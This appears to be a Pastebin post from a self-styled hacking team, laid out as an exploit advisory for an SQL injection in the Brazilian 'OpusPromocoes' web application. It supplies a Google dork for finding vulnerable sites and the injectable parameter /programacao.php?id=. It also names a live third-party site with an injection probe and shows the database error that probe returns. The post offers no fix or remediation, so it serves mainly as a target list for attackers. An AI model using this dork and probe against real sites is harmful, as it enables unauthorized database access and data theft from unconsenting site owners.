KingSkrupellos

OpusPromocoes Brazil SQL Injection

Apr 24th, 2019
58
0
Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
text 2.31 KB | None | 0 0
  1. ###################################################################
  2.  
  3. # Exploit Title : OpusPromocoes Brazil SQL Injection
  4. # Author [ Discovered By ] : KingSkrupellos
  5. # Team : Cyberizm Digital Security Army
  6. # Date : 25/04/2019
  7. # Vendor Homepage : opuspromocoes.com.br
  8. # Tested On : Windows and Linux
  9. # Category : WebApps
  10. # Exploit Risk : Medium
  11. # Google Dorks : opuspromocoes inurl:/programacao.php?id=
  12. # Vulnerability Type : CWE-89 [ Improper Neutralization of
  13. Special Elements used in an SQL Command ('SQL Injection') ]
  14. # PacketStormSecurity : packetstormsecurity.com/files/authors/13968
  15. # CXSecurity : cxsecurity.com/author/KingSkrupellos/1/
  16. # Exploit4Arab : exploit4arab.org/author/351/KingSkrupellos
  17.  
  18. ###################################################################
  19.  
  20. # Impact :
  21. ***********
  22. OpusPromocoes Brazil is prone to an SQL-injection vulnerability because
  23.  
  24. it fails to sufficiently sanitize user-supplied data before using it in an SQL query.
  25.  
  26. Exploiting this issue could allow an attacker to compromise the application, access or
  27.  
  28. modify data, or exploit latent vulnerabilities in the underlying database.
  29.  
  30. A remote attacker can send a specially crafted request to the vulnerable application and
  31.  
  32. execute arbitrary SQL commands in application`s database. Further exploitation of this
  33.  
  34. vulnerability may result in unauthorized data manipulation.
  35.  
  36. An attacker can exploit this issue using a browser or with any SQL Injector Tool.
  37.  
  38. ###################################################################
  39.  
  40. # SQL Injection Exploit :
  41. **********************
  42. /programacao.php?id=[SQL Injection]
  43.  
  44. ###################################################################
  45.  
  46. # Example Vulnerable Sites :
  47. *************************
  48. [+] teatroriomarrecife.com.br/programacao.php?id=25%27
  49.  
  50. ###################################################################
  51.  
  52. # Example SQL Database Error :
  53. ****************************
  54. You have an error in your SQL syntax; check the manual that corresponds
  55. to your MySQL server version for the right syntax to use near ')
  56. order by find_in_set(id,'')' at line 1
  57.  
  58. ###################################################################
  59.  
  60. # Discovered By KingSkrupellos from Cyberizm.Org Digital Security Team
  61.  
  62. ###################################################################
Add Comment
Please, Sign In to add comment